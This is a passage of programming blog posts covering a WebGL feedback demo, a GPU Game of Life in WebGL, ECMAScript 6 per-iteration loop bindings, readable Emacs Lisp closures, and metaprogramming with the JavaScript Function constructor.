The enumeration passed to glBlendFunc decides how the colors are combined. In WebGL our options are GL_FUNC_ADD (a + b), GL_FUNC_SUBTRACT (a - b), GL_FUNC_REVERSE_SUBTRACT (b - a). In regular OpenGL there’s also GL_MIN (min(a, b)) and GL_MAX (max(a, b)).

The function glBlendEquation takes two enumerations, choosing how the alpha channels are applied to the colors before the blend function (above) is applied. The alpha channel could be ignored and the color used directly (GL_ONE) or discarded (GL_ZERO). The alpha channel could be multiplied directly (GL_SRC_ALPHA, GL_DST_ALPHA), or inverted first (GL_ONE_MINUS_SRC_ALPHA). In WebGL there are 72 possible combinations.

gl.enable(gl.BLEND);
gl.blendEquation(gl.FUNC_ADD);
gl.blendFunc(gl.SRC_ALPHA, gl.SRC_ALPHA);

In this project I’m using GL_FUNC_ADD and GL_SRC_ALPHA for both source and destination. The alpha value put out by the fragment shader is the experimentally-determined, magical value of 0.62. A little higher and the feedback tends to blend towards bright white really fast. A little lower and it blends away to nothing really fast. It’s a numerical instability that has the interesting side effect of making the demo behave slightly differently depending on the floating point precision of the GPU running it!

Saving a Screenshot

The HTML5 canvas object that provides the WebGL context has a toDataURL() method for grabbing the canvas contents as a friendly base64-encoded PNG image. Unfortunately this doesn’t work with WebGL unless the preserveDrawingBuffer options is set, which can introduce performance issues. Without this option, the browser is free to throw away the drawing buffer before the next JavaScript turn, making the pixel information inaccessible.

By coincidence there’s a really convenient workaround for this project. Remember that state texture? That’s exactly what we want to save. I can attach it to a framebuffer and use glReadPixels just like did in WebGL Game of Life to grab the simulation state. The pixel data is then drawn to a background canvas (without using WebGL) and toDataURL() is used on that canvas to get a PNG image. I slap this on a link with the new download attribute and call it done.

Anti-aliasing

At the time of this writing, support for automatic anti-aliasing in WebGL is sparse at best. I’ve never seen it working anywhere yet, in any browser on any platform. GL_SMOOTH isn’t available and the anti-aliasing context creation option doesn’t do anything on any of my computers. Fortunately I was able to work around this using a cool smoothstep trick.

The article I linked explains it better than I could, but here’s the gist of it. This shader draws a circle in a quad, but leads to jagged, sharp edges.

uniform vec4 color;
varying vec3 coord;  // object space

void main() {
    if (distance(coord.xy, vec2(0, 0)) < 1.0) {
        gl_FragColor = color;
    } else {
        gl_FragColor = vec4(0, 0, 0, 1);
    }
}

The improved version uses smoothstep to fade from inside the circle to outside the circle. Not only does it look nicer on the screen, I think it looks nicer as code, too. Unfortunately WebGL has no fwidth function as explained in the article, so the delta is hardcoded.

uniform vec4 color;
varying vec3 coord;

const vec4 outside = vec4(0, 0, 0, 1);
const float delta = 0.1;

void main() {
    float dist = distance(coord.xy, vec2(0, 0));
    float a = smoothstep(1.0 - delta, 1.0, dist);
    gl_FragColor = mix(color, outside, a);
}

Matrix Uniforms

Up until this point I had avoided matrix uniforms. I was doing transformations individually within the shader. However, as transforms get more complicated, it’s much better to express the transform as a matrix and let the shader language handle matrix multiplication implicitly. Rather than pass half a dozen uniforms describing the transform, you pass a single matrix that has the full range of motion.

My Igloo WebGL library originally had a vector library that provided GLSL-style vectors, including full swizzling. My long term goal was to extend this to support GLSL-style matrices. However, writing a matrix library from scratch was turning out to be far more work than I expected. Plus it’s reinventing the wheel.

So, instead, I dropped my vector library — I completely deleted it — and decided to use glMatrix, a really solid WebGL-friendly matrix library. Highly recommended! It doesn’t introduce any new types, it just provides functions for operating on JavaScript typed arrays, the same arrays that get passed directly to WebGL functions. This composes perfectly with Igloo without making it a formal dependency.

Here’s my function for creating the mat3 uniform that transforms both the main texture as well as the individual shape sprites. This use of glMatrix looks a lot like java.awt.geom.AffineTransform, does it not? That’s one of my favorite parts of Java 2D, and I’ve been missing it.

/* Translate, scale, and rotate. */
Feedback.affine = function(tx, ty, sx, sy, a) {
    var m = mat3.create();
    mat3.translate(m, m, [tx, ty]);
    mat3.rotate(m, m, a);
    mat3.scale(m, m, [sx, sy]);
    return m;
};

The return value is just a plain Float32Array that I can pass to glUniformMatrix3fv. It becomes the placement uniform in the shader.

attribute vec2 quad;
uniform mat3 placement;
varying vec3 coord;

void main() {
    coord = vec3(quad, 0);
    vec2 position = (placement * vec3(quad, 1)).xy;
    gl_Position = vec4(position, 0, 1);
}

To move to 3D graphics from here, I would just need to step up to a mat4 and operate on 3D coordinates instead of 2D. glMatrix would still do the heavy lifting on the CPU side. If this was part of an OpenGL tutorial series, perhaps that’s how it would transition to the next stage.

Conclusion

I’m really happy with how this one turned out. The only way it’s indistinguishable from the original applet is that it runs faster. In preparation for this project, I made a big pile of improvements to Igloo, bringing it up to speed with my current WebGL knowledge. This will greatly increase the speed at which I can code up and experiment with future projects. WebGL + Skewer + Igloo has really become a powerful platform for rapid prototyping with OpenGL.

A GPU Approach to Conway's Game of Life

2014-06-10T06:29:48Z

Update: In the next article, I extend this program to solving mazes. The demo has also been ported to the Skew programming language.

Conway’s Game of Life is another well-matched workload for GPUs. Here’s the actual WebGL demo if you want to check it out before continuing.

https://skeeto.github.io/webgl-game-of-life/ (source)

To quickly summarize the rules:

The universe is a two-dimensional grid of 8-connected square cells.
A cell is either dead or alive.
A dead cell with exactly three living neighbors comes to life.
A live cell with less than two neighbors dies from underpopulation.
A live cell with more than three neighbors dies from overpopulation.

These simple cellular automata rules lead to surprisingly complex, organic patterns. Cells are updated in parallel, so it’s generally implemented using two separate buffers. This makes it a perfect candidate for an OpenGL fragment shader.

Preparing the Textures

The entire simulation state will be stored in a single, 2D texture in GPU memory. Each pixel of the texture represents one Life cell. The texture will have the internal format GL_RGBA. That is, each pixel will have a red, green, blue, and alpha channel. This texture is not drawn directly to the screen, so how exactly these channels are used is mostly unimportant. It’s merely a simulation data structure. This is because I’m using the OpenGL programmable pipeline for general computation. I’m calling this the “front” texture.

Four multi-bit (actual width is up to the GPU) channels seems excessive considering that all I really need is a single bit of state for each cell. However, due to framebuffer completion rules, in order to draw onto this texture it must be GL_RGBA. I could pack more than one cell into one texture pixel, but this would reduce parallelism: the shader will run once per pixel, not once per cell.

Because cells are updated in parallel, this texture can’t be modified in-place. It would overwrite important state. In order to do any real work I need a second texture to store the update. This is the “back” texture. After the update, this back texture will hold the current simulation state, so the names of the front and back texture are swapped. The front texture always holds the current state, with the back texture acting as a workspace.

GOL.prototype.swap = function() {
    var tmp = this.textures.front;
    this.textures.front = this.textures.back;
    this.textures.back = tmp;
    return this;
};

Here’s how a texture is created and prepared. It’s wrapped in a function/method because I’ll need two identical textures, making two separate calls to this function. All of these settings are required for framebuffer completion (explained later).

GOL.prototype.texture = function() {
    var gl = this.gl;
    var tex = gl.createTexture();
    gl.bindTexture(gl.TEXTURE_2D, tex);
    gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_WRAP_S, gl.REPEAT);
    gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_WRAP_T, gl.REPEAT);
    gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_MIN_FILTER, gl.NEAREST);
    gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_MAG_FILTER, gl.NEAREST);
    gl.texImage2D(gl.TEXTURE_2D, 0, gl.RGBA,
                  this.statesize.x, this.statesize.y,
                  0, gl.RGBA, gl.UNSIGNED_BYTE, null);
    return tex;
};

A texture wrap of GL_REPEAT means the simulation will be automatically torus-shaped. The interpolation is GL_NEAREST, because I don’t want to interpolate between cell states at all. The final OpenGL call initializes the texture size (this.statesize). This size is different than the size of the display because, again, this is actually a simulation data structure for my purposes.

The null at the end would normally be texture data. I don’t need to supply any data at this point, so this is left blank. Normally this would leave the texture content in an undefined state, but for security purposes, WebGL will automatically ensure that it’s zeroed. Otherwise there’s a chance that sensitive data might leak from another WebGL instance on another page or, worse, from another process using OpenGL. I’ll make a similar call again later with glTexSubImage2D() to fill the texture with initial random state.

In OpenGL ES, and therefore WebGL, wrapped (GL_REPEAT) texture dimensions must be powers of two, i.e. 512x512, 256x1024, etc. Since I want to exploit the built-in texture wrapping, I’ve decided to constrain my simulation state size to powers of two. If I manually did the wrapping in the fragment shader, I could make the simulation state any size I wanted.

Framebuffers

A framebuffer is the target of the current glClear(), glDrawArrays(), or glDrawElements(). The user’s display is the default framebuffer. New framebuffers can be created and used as drawing targets in place of the default framebuffer. This is how things are drawn off-screen without effecting the display.

A framebuffer by itself is nothing but an empty frame. It needs a canvas. Other resources are attached in order to make use of it. For the simulation I want to draw onto the back buffer, so I attach this to a framebuffer. If this framebuffer is bound at the time of the draw call, the output goes onto the texture. This is really powerful because this texture can be used as an input for another draw command, which is exactly what I’ll be doing later.

Here’s what making a single step of the simulation looks like.

GOL.prototype.step = function() {
    var gl = this.gl;
    gl.bindFramebuffer(gl.FRAMEBUFFER, this.framebuffers.step);
    gl.framebufferTexture2D(gl.FRAMEBUFFER, gl.COLOR_ATTACHMENT0,
                            gl.TEXTURE_2D, this.textures.back, 0);
    gl.viewport(0, 0, this.statesize.x, this.statesize.y);
    gl.bindTexture(gl.TEXTURE_2D, this.textures.front);
    this.programs.gol.use()
        .attrib('quad', this.buffers.quad, 2)
        .uniform('state', 0, true)
        .uniform('scale', this.statesize)
        .draw(gl.TRIANGLE_STRIP, 4);
    this.swap();
    return this;
};

First, bind the custom framebuffer as the current framebuffer with glBindFramebuffer(). This framebuffer was previously created with glCreateFramebuffer() and required no initial configuration. The configuration is entirely done here, where the back texture is attached to the current framebuffer. This replaces any texture that might currently be attached to this spot — like the front texture from the previous iteration. Finally, the size of the drawing area is locked to the size of the simulation state with glViewport().

Using Igloo again to keep the call concise, a fullscreen quad is rendered so that the fragment shader runs exactly once for each cell. That state uniform is the front texture, bound as GL_TEXTURE0.

With the drawing complete, the buffers are swapped. Since every pixel was drawn, there’s no need to ever use glClear().

The Game of Life Fragment Shader

The simulation rules are coded entirely in the fragment shader. After initialization, JavaScript’s only job is to make the appropriate glDrawArrays() call over and over. To run different cellular automata, all I would need to do is modify the fragment shader and generate an appropriate initial state for it.

uniform sampler2D state;
uniform vec2 scale;

int get(int x, int y) {
    return int(texture2D(state, (gl_FragCoord.xy + vec2(x, y)) / scale).r);
}

void main() {
    int sum = get(-1, -1) +
              get(-1,  0) +
              get(-1,  1) +
              get( 0, -1) +
              get( 0,  1) +
              get( 1, -1) +
              get( 1,  0) +
              get( 1,  1);
    if (sum == 3) {
        gl_FragColor = vec4(1.0, 1.0, 1.0, 1.0);
    } else if (sum == 2) {
        float current = float(get(0, 0));
        gl_FragColor = vec4(current, current, current, 1.0);
    } else {
        gl_FragColor = vec4(0.0, 0.0, 0.0, 1.0);
    }
}

The get(int, int) function returns the value of the cell at (x, y), 0 or 1. For the sake of simplicity, the output of the fragment shader is solid white and black, but just sampling one channel (red) is good enough to know the state of the cell. I’ve learned that loops and arrays are are troublesome in GLSL, so I’ve manually unrolled the neighbor check. Cellular automata that have more complex state could make use of the other channels and perhaps even exploit alpha channel blending in some special way.

Otherwise, this is just a straightforward encoding of the rules.

Displaying the State

What good is the simulation if the user doesn’t see anything? So far all of the draw calls have been done on a custom framebuffer. Next I’ll render the simulation state to the default framebuffer.

GOL.prototype.draw = function() {
    var gl = this.gl;
    gl.bindFramebuffer(gl.FRAMEBUFFER, null);
    gl.viewport(0, 0, this.viewsize.x, this.viewsize.y);
    gl.bindTexture(gl.TEXTURE_2D, this.textures.front);
    this.programs.copy.use()
        .attrib('quad', this.buffers.quad, 2)
        .uniform('state', 0, true)
        .uniform('scale', this.viewsize)
        .draw(gl.TRIANGLE_STRIP, 4);
    return this;
};

First, bind the default framebuffer as the current buffer. There’s no actual handle for the default framebuffer, so using null sets it to the default. Next, set the viewport to the size of the display. Then use the “copy” program to copy the state to the default framebuffer where the user will see it. One pixel per cell is far too small, so it will be scaled as a consequence of this.viewsize being four times larger.

Here’s what the “copy” fragment shader looks like. It’s so simple because I’m storing the simulation state in black and white. If the state was in a different format than the display format, this shader would need to perform the translation.

uniform sampler2D state;
uniform vec2 scale;

void main() {
    gl_FragColor = texture2D(state, gl_FragCoord.xy / scale);
}

Since I’m scaling up by four — i.e. 16 pixels per cell — this fragment shader is run 16 times per simulation cell. Since I used GL_NEAREST on the texture there’s no funny business going on here. If I had used GL_LINEAR, it would look blurry.

You might notice I’m passing in a scale uniform and using gl_FragCoord. The gl_FragCoord variable is in window-relative coordinates, but when I sample a texture I need unit coordinates: values between 0 and 1. To get this, I divide gl_FragCoord by the size of the viewport. Alternatively I could pass the coordinates as a varying from the vertex shader, automatically interpolated between the quad vertices.

An important thing to notice is that the simulation state never leaves the GPU. It’s updated there and it’s drawn there. The CPU is operating the simulation like the strings on a marionette — from a thousand feet up in the air.

User Interaction

What good is a Game of Life simulation if you can’t poke at it? If all of the state is on the GPU, how can I modify it? This is where glTexSubImage2D() comes in. As its name implies, it’s used to set the values of some portion of a texture. I want to write a poke() method that uses this OpenGL function to set a single cell.

GOL.prototype.poke = function(x, y, value) {
    var gl = this.gl,
        v = value * 255;
    gl.bindTexture(gl.TEXTURE_2D, this.textures.front);
    gl.texSubImage2D(gl.TEXTURE_2D, 0, x, y, 1, 1,
                     gl.RGBA, gl.UNSIGNED_BYTE,
                     new Uint8Array([v, v, v, 255]));
    return this;
};

Bind the front texture, set the region at (x, y) of size 1x1 (a single pixel) to a very specific RGBA value. There’s nothing else to it. If you click on the simulation in my demo, it will call this poke method. This method could also be used to initialize the entire simulation with random values, though it wouldn’t be very efficient doing it one pixel at a time.

Getting the State

What if you wanted to read the simulation state into CPU memory, perhaps to store for reloading later? So far I can set the state and step the simulation, but there’s been no way to get at the data. Unfortunately I can’t directly access texture data. There’s nothing like the inverse of glTexSubImage2D(). Here are a few options:

Call toDataURL() on the canvas. This would grab the rendering of the simulation, which would need to be translated back into simulation state. Sounds messy.
Take a screenshot. Basically the same idea, but even messier.
Use glReadPixels() on a framebuffer. The texture can be attached to a framebuffer, then read through the framebuffer. This is the right solution.

I’m reusing the “step” framebuffer for this since it’s already intended for these textures to be its attachments.

GOL.prototype.get = function() {
    var gl = this.gl, w = this.statesize.x, h = this.statesize.y;
    gl.bindFramebuffer(gl.FRAMEBUFFER, this.framebuffers.step);
    gl.framebufferTexture2D(gl.FRAMEBUFFER, gl.COLOR_ATTACHMENT0,
                            gl.TEXTURE_2D, this.textures.front, 0);
    var rgba = new Uint8Array(w * h * 4);
    gl.readPixels(0, 0, w, h, gl.RGBA, gl.UNSIGNED_BYTE, rgba);
    return rgba;
};

Voilà! This rgba array can be passed directly back to glTexSubImage2D() as a perfect snapshot of the simulation state.

Conclusion

This project turned out to be far simpler than I anticipated, so much so that I was able to get the simulation running within an evening’s effort. I learned a whole lot more about WebGL in the process, enough for me to revisit my WebGL liquid simulation. It uses a similar texture-drawing technique, which I really fumbled through that first time. I dramatically cleaned it up, making it fast enough to run smoothly on my mobile devices.

Also, this Game of Life implementation is blazing fast. If rendering is skipped, it can run a 2048x2048 Game of Life at over 18,000 iterations per second! However, this isn’t terribly useful because it hits its steady state well before that first second has passed.

Per Loop vs. Per Iteration Bindings

2014-06-06T20:18:58Z

The April 5th, 2014 draft of the ECMA-262 6th Edition specification — a.k.a the next major version of JavaScript/ECMAScript — contained a subtle, though very significant, change to the semantics of the for loop (13.6.3.3). Loop variables are now fresh bindings for each iteration of the loop: a per-iteration binding. Previously loop variables were established once for the entire loop, a per-loop binding. The purpose is an attempt to fix an old gotcha that effects many languages.

If you couldn’t already tell, this is going to be another language lawyer post!

Backup to C

To try to explain what this all means this in plain English, let’s step back a moment and discuss what a for loop really is. I can’t find a source for this, but I’m pretty confident the three-part for loop originated in K&R C.

for (INITIALIZATION; CONDITION; ITERATION) {
    BODY;
}

Evaluate INITIALIZATION.
Evaluate CONDITION. If zero (false), exit the for.
Evaluate BODY.
Evaluate ITERATION and go to 2.

In the original C, and all the way up to C89, no variable declarations were allowed in the initialization expression. I can understand why: there’s a subtle complication, though it’s harmless in C. We’ll get to that soon. Here’s a typical C89 for loop.

int count = 10;
/* ... */
int i;
for (i = 0; i < count; i++) {
    double foo;
    /* ... */
}

The variable i is established independent of the loop, in the scope outside the for loop, alongside count. This isn’t even a per-loop binding. As far as the language is concerned, it’s just a variable that the loop happens to access and mutate. It’s very assembly-language-like. Because C has block scoping, the body of the for loop is another nested scope. The variable foo is in this scope, reestablished on each iteration of the loop (per-iteration).

As an implementation detail, foo will reside at the same location on the stack each time around the loop. If it’s accessed before being initialized, it will probably hold the value from the previous iteration, but, as far as the language is concerned, this is just a happy, though undefined, coincidence.

C99 Loops

Fast forward to the end of the 20th century. At this point, other languages have allowed variable declarations in the initialization part for years, so it’s time for C to catch up with C99.

int count = 10;
/* ... */
for (int i = 0; i < count; i++) {
    double foo;
    /* ... */
}

Now consider this: in what scope is the variable i? The outer scope as before? The iteration scope with foo? The answer is neither. In order to make this work, a whole new loop scope is established in between: a per-loop binding. This scope holds for the entire duration of the loop.

The variable i is constrained to the for loop without being limited to the iteration scope. This is important because i is what keeps track of the loop’s progress. The semantic equivalent in C89 makes the additional scope explicit with a block.

int count = 10;
/* ... */
{
    int i;
    for (i = 0; i < count; i++) {
        double foo;
        /* ... */
    }
}

This, ladies and gentlemen, is the the C-style 3-part for loop. Every language that has this statement, and has block scope, follows these semantics. This included JavaScript up until two months ago, where the draft now gives it its own unique behavior.

JavaScript’s Let

As it exists today in its practical form, little of the above is relevant to JavaScript. JavaScript has no block scope, just function scope. A three-part for-loop doesn’t establish all these scopes, because scopes like these are absent from the language.

An important change coming with 6th edition is the introduction of let declarations. Variables declared with let will have block scope.

let count = 10;
// ...
for(let i = 0; i < count; i++) {
    let foo;
    // ...
}
console.log(foo); // error
console.log(i);   // error

If these variables had been declared with var, the last two lines wouldn’t be errors (or worse, global references). count, i, and foo would all be in the same function-level scope. This is really great! I look forward to using let exclusively someday.

The Closure Trap

I mentioned a subtle complication. Most of the time programmers don’t need to consider or even be aware of this middle scope. However, when combined with closures it suddenly becomes an issue. Here’s an example with Perl,

my @closures;
for (my $i = 0; $i < 2; $i++) {
    push(@closures, sub { return $i; });
}
$closures[0]();  # => 2
$closures[1]();  # => 2

Here’s one with Python. Python lacks a three-part for loop, but its standard for loop has similar semantics.

closures = []
for i in xrange(2):
    closures.append(lambda: i)
closures[0]()  # => 1
closures[1]()  # => 1

And now Ruby.

closures = []
for i in (0..1)
  closures << lambda { i }
end
closures[0].call  # => 1
closures[1].call  # => 1

In all three cases, one closure is created per iteration. Each closure captures the loop variable i. It’s easy to make the mistake of thinking each closure will return a unique value. However, as pointed out above, this is a per-loop variable, existing in a middle scope. The closures all capture the same variable, merely bound to different values at the time of capture. The solution is to establish a new variable in the iteration scope and capture that instead. Below, I’ve established a $value variable for this.

my @closures;
for (my $i = 0; $i < 2; $i++) {
    my $value = $i;
    push(@closures, sub { return $value; });
}
$closures[0]();  # => 0
$closures[1]();  # => 1

This is something that newbies easily get tripped up on. Because they’re still trying to wrap their heads around the closure concept, this looks like some crazy bug in the interpreter/compiler. I can understand why the ECMA-262 draft was changed to accommodate this situation.

The JavaScript Workaround

The language in the new draft has two items called perIterationBindings and CreatePerIterationEnvironment (in case you’re searching for the relevant part of the spec). Like the $value example above, for loops in JavaScript with “lexical” (i.e. let) loop bindings will implicitly mask the loop variable with a variable of the same name in the iteration scope.

let closures = [];
for (let i = 0; i < 2; i++) {
    closures.push(function() { return i; });
}

/* Before the change: */
closures[0]();  // => 2
closures[1]();  // => 2

/* After the change: */
closures[0]();  // => 0
closures[1]();  // => 1

Note: If you try to run this yourself, note that at the time of this writing, the only JavaScript implementation I could find that updated to the latest draft was Traceur. You’ll probably see the “before” behavior for now.

You can’t see it (I said it’s implicit!), but under an updated JavaScript implementation there are actually two i variables here. The closures capture the most inner i, the per-iteration version of i. Let’s go back to the original example, JavaScript-style.

let count = 10;
// ...
for (let i = 0; i < count; i++) {
   let foo;
   // ...
}

Here’s what the scope looks like for the latest draft. Notice the second i in the iteration scope. The inner i is initially assigned to the value of the outer i.

We could emulate this in an older edition. Imagine writing a macro to do this.

let count = 10;
// ...
for (let i = 0; i < count; i++) {
    let __i = i;  // (possible name collision)
    {
        let i = __i;
        let foo;
        // ...
    }
}

I have to use __i to smuggle the value across scopes without having i reference itself. Unlike Lisp’s let, the assignment value for var and let is evaluated in the nested scope, not the outer scope.

Each iteration gets its own i. But what happens when the loop modifies i? Simple, it’s copied back out at the end of the body.

let count = 10;
// ...
for (let i = 0; i < count; i++) {
    let __i = i;
    {
        let i = __i;
        let foo;
        // ...
        __i = i;
    }
    i = __i;
}

Now all the expected for semantics work — the body can also update the loop variable — but we still get the closure-friendly per-iteration variables.

Conclusion

I’m still not sure if I really like this change. It’s clean fix, but the gotcha hasn’t been eliminated. Instead it’s been inverted. Sometime someone will have the unusual circumstance of wanting to capture the loop variable, and he will run into some surprising behavior. Because the semantics are a lot more complicated, it’s hard to reason about what’s not working unless you already know JavaScript has magical for loops.

Perl and C# each also gained per-iteration bindings in their history, but rather than complicate or change their standard for loops, they instead introduced it as a new syntactic construction: foreach.

my @closures;
foreach my $i (0, 1) {
    push(@closures, sub { return $i; });
}
$closures[0]();  # => 0
$closures[1]();  # => 1

In this case, per-iteration bindings definitely make sense. The variable $i is established and bound to each value in turn. As far as control flow goes, it’s very functional. The binding is never actually mutated.

I think it could be argued that Python and Ruby’s for ... in forms should behave like this foreach. These were probably misdesigned early on, but it’s not possible to change their semantics at this point. Because JavaScript’s var was improperly designed from the beginning, let offers the opportunity to fix more than just var. We’re seeing this right now with these new for semantics.

Emacs Lisp Readable Closures

2013-12-30T23:52:38Z

I’ve stated before that one of the unique features of Emacs Lisp is that its closures are readable. Closures can be serialized by the printer and read back in with the reader. I am unaware of any other programming language that has this feature. In fact it’s essential for Elisp byte-code compilation because byte-compiled Elisp files are merely s-expressions of byte-code dumped out as source.

Lisp Printing

The Lisp family of languages are homoiconic. Lisp source code is written in the syntax of its own data structures, s-expressions. Since a compiler/interpreter is usually provided at run-time, a consequence of this is that reading and printing are a fundamental feature of Lisps. A value can be handed to the printer, which will serialize the value into an s-expression as a sequence of characters. Later on the reader can parse the s-expression back into an equal value.

To compare, JavaScript originally had half of this in place. JavaScript has convenient object syntax for defining an associative array, known today as JSON. The eval function could (dangerously) be used as a reader for parsing a string containing JSON-encoded data into a value. But until JSON.stringify() became standard, developers had to write their own printer. Lisp s-expression syntax is much more powerful (and complicated) than JSON, maintaining both identity and cycles (e.g. *print-circle*).

Not all values can be read. They’ll still print (when *print-readably* is nil) but will do so using special syntax that will signal an error in the reader: #<. For example, in Emacs Lisp buffers cannot be serialized so they print using this syntax.

(prin1-to-string (current-buffer))
;; => "#"

It doesn’t matter what’s between the angle brackets, or even that there’s a closing angle bracket. The reader will signal an error as soon as it hits a #<.

Almost Everything Prints Readably

Elisp has a small set of primitive data types. All of these primitive types print readably:

integer (1024, ?a)
float (1.7)
cons/list ((...))
vector (one-dimensional, [...])
bool-vector (#&n"...")
string ("...")
char-table (#^[...])
hash-table (readable as of Emacs 23.3, #s(hash-table ...))
byte-code function object (#[...])
symbol

Here are all the non-readable types. Each one has a good reason for not being serializable.

buffer
process (external state)
frame (user interface element)
marker (live, automatically updates)
overlay (belongs to a buffer)
built-in functions (native code)
user-ptr (opaque pointers from Emacs 25 dynamic modules)

And that’s it. Every other value in Elisp is constructed from one or more of these primitives, including keymaps, functions, macros, syntax tables, defstruct structs, and EIEIO objects. This means that as long as these values don’t refer to an unreadable value, they themselves can be printed.

An interesting note here is that, unlike the Common Lisp Object System (CLOS), EIEIO objects are readable by default. To Elisp they’re just vectors, so of course they print. CLOS objects are unreadable without manually defining a print method per class.

Elisp Closures

Elisp got lexical scoping in Emacs 24, released in June 2012. It’s now one of the relatively few languages to have both dynamic and lexical scope. Like Common Lisp, variables declared with defvar (and family) continue to have dynamic scope. For backwards compatibility with old Lisp code, lexical scope is disabled by default. It’s enabled for a specific file or buffer by setting lexical-binding to non-nil.

With lexical scope, anonymous functions become closures, a powerful functional programming primitive: a function plus a captured lexical environment. It also provides some performance benefits. In my own tests, compiled Elisp with lexical scope enabled is about 10% to 15% faster than with the default dynamic scope.

What do closures look like in Emacs Lisp? It takes on two forms depending on whether the closure is compiled or not. For example, consider this function, foo, that takes two arguments and returns a closure that returns the first argument.

;; -*- lexical-binding: t; -*-
(defun foo (x y)
  (lambda () x))

(foo :bar :ignored)
;; => (closure ((y . :ignored) (x . :bar) t) () x)

An uncompiled closure is a list beginning with the symbol closure. The second element is the lexical environment, the third is the argument list (lambda list), and the rest is the body of the function. Here we can see that both x and y have been “closed over.” This is a little bit sloppy because the function never makes use of y. Capturing it has a few problems.

The closure has a larger footprint than necessary.
Values are held longer than necessary, delaying collection.
It affects the readability of the closure, which I’ll get to later.

Fortunately the compiler is smart enough to see this and will avoid capturing unused variables. To prove this, I’ve now compiled foo so that it returns a compiled closure.

(foo :bar :ignored)
;; => #[0 "\300\207" [:bar] 1]

What’s returned here is a byte-code function object, with the #[...] syntax. It has these elements:

The function’s lambda list (zero arguments)
Byte-codes stored in a unibyte string
Constants vector
Maximum stack space needed by this function

Notice that the lexical environment has been captured in the constants vector, specifically noting the lack of :ignored in this vector. The compiler didn’t capture it.

For those curious about the byte-code here’s an explanation. The string syntax shown is in octal, representing a string containing two bytes: 192 and 135. The Elisp byte-code interpreter is stack-based. The 192 (constant 0) says to push the first constant onto the stack. The 135 (return) says to pop the top element from the stack and return it.

(coerce "\300\207" 'list)
;; => (192 135)

The Readable Closures Catch

Since closures are byte-code function objects, they print readably. You can capture an environment in a closure, serialize it, read it back in, and evaluate it. That’s pretty cool! This means closures can be transmitted to other Emacs instances in a multi-processing setup (i.e. Elnode, Async)

The catch is that it’s easy to accidentally capture an unreadable value, especially buffers. Consider this function bar which uses a temporary buffer as an efficient string builder. It returns a closure that returns the result. (Weird, but stick with me here!)

(defun bar (n)
  (with-temp-buffer
    (let ((standard-output (current-buffer)))
      (loop for i from 0 to n do (princ i))
      (let ((string (buffer-string)))
        (lambda () string)))))

The compiled form looks fine,

(bar 3)
;; => #[0 "\300\207" ["0123"] 1]

But the interpreted form of the closure has a problem. The with-temp-buffer macro silently introduced a new binding — an abstraction leak.

(bar 3)
;; => (closure ((string . "0123")
;;              (temp-buffer . #)
;;              (n . 3) t)
;;      () string)

The temporary buffer is mistakenly captured in the closure making it unreadable, but only in its uncompiled form. This creates the awkward situation where compiled and uncompiled code has different behavior.

JavaScript Function Metaprogramming

2013-08-17T00:00:00Z

The JavaScript Function constructor is useful metaprogramming feature of JavaScript. It works like eval, treating the contents of a string as code, but without the quirkiness. The constructor’s API looks like this,

new Function([arg1[, arg2[, ... argN]],] functionBody)

For example, creating a 2-argument add function at run-time,

var add = new Function('x', 'y', 'return x + y');
add(3, 5);  // => 8

In all of the JavaScript engines I’m aware of, functions created this way are fully optimized and JITed just like any other, except that this is done later. The function isn’t established at compile-time but at some point during run-time. The constructor could be implemented in pure JavaScript using eval,

/* Notice: not 100% correct, but close. */
function Function() {
    var args = Array.prototype.slice.call(arguments, 0);
    var body = args.pop();
    return eval('(function(' + args.join(', ') + ') { ' + body + ' })');
}

Constructor Misuse

Misusing the Function constructor has the risk that you may invoke compilation repeatedly. For example, both of these functions return an array of adder functions.

function literal() {
    var out = [];
    for (var i = 0; i < 10; i++) {
        out.push(function(x, y) { return x + y; });
    }
    return out;
}

function constructor() {
    var out = [];
    for (var i = 0; i < 10; i++) {
        out.push(new Function('x', 'y', 'return x + y'));
    }
    return out;
}

The literal function creates 10 unique closure objects.

var x = literal();
x[0] === x[1];  // => false

While these appear to be unique objects, they’re all backed by the same code in memory. Since the function has no free variables, it doesn’t actually capture anything. These closures are really just empty handles to the same function. This function will be recognized and compiled ahead of time before literal is ever executed.

On the other hand, short of any serious optimization magic, the constructor function version of this creates 10 unique backing functions, invoking the compiler for each one individually at run-time. If they’re used enough to warrant it, each will also be optimized separately. This is a misuse of the Function constructor, as bad as misusing eval.

What’s it for?

As stated before, the Function constructor is useful for metaprogramming. Use it to generate source code programmatically. For example, this function generates 64 new functions by assembling source code from strings.

function opfuncs() {
    var ops = ['+', '-', '*', '/'];
    var names = ['a', 's', 'm', 'd'];
    var funcs = {};
    for (var i = 0; i < ops.length; i++) {
        for (var j = 0; j < ops.length; j++) {
            for (var k = 0; k < ops.length; k++) {
                var name = names[i] + names[j] + names[k],
                    body = ['w', ops[i], 'x', ops[j], 'y', ops[k], 'z'];
                funcs[name] = new Function('w', 'x', 'y', 'z',
                                           'return ' + body.join(''));
            }
        }
    }
    return funcs;
}

Writing out all these functions explicitly would take 66 lines of code instead of just 16, and it would be error prone and more difficult to maintain. Metaprogramming is a win here.

/* Ugh ... */
var opfuncs = {
    aaa: function(w, x, y, z) { return w + x + y + z; },
    aas: function(w, x, y, z) { return w + x + y - z; },
    /* ... */
    ddd: function(w, x, y, z) { return w / x / y / z; }
};

The opfuncs function should be called exactly once. These functions shouldn’t be generated multiple times because the benefits of the metaprogramming approach would be lost. To ensure that, I’m replacing the function with its result in this example,

opfuncs = opfuncs();
opfuncs.aaa(2,3,4,5); // 2+3+4+5 => 14
opfuncs.ama(2,3,4,5); // 2+3*4+5 => 19

The final metaprogrammed opfuncs object should completely indistinguishable from the longer, explicit version.

The Design Flaw

The primary flaw with the Function constructor is that it’s variadic. The whole purpose of this constructor is to dynamically generate functions at run-time, but there’s (generally) no straightforward way to call a constructor with a variable number of arguments. The apply method can’t directly compose with new.

Say we want to write a version of opfuncs where, rather than generate 64 4-argument functions, it generates 4^(n-1) n-argument functions, taking an argument n. Now new Function needs to be applied to a variable number of arguments (n + 1).

If rather than take argument names as individual arguments, Function took them as an array, this would be straightforward. It would be like having apply built-in. This is how I would have designed Function to work.

new Function(argNames, functionBody)

Used like this,

var add = new Function(['x', 'y'], 'return x + y');

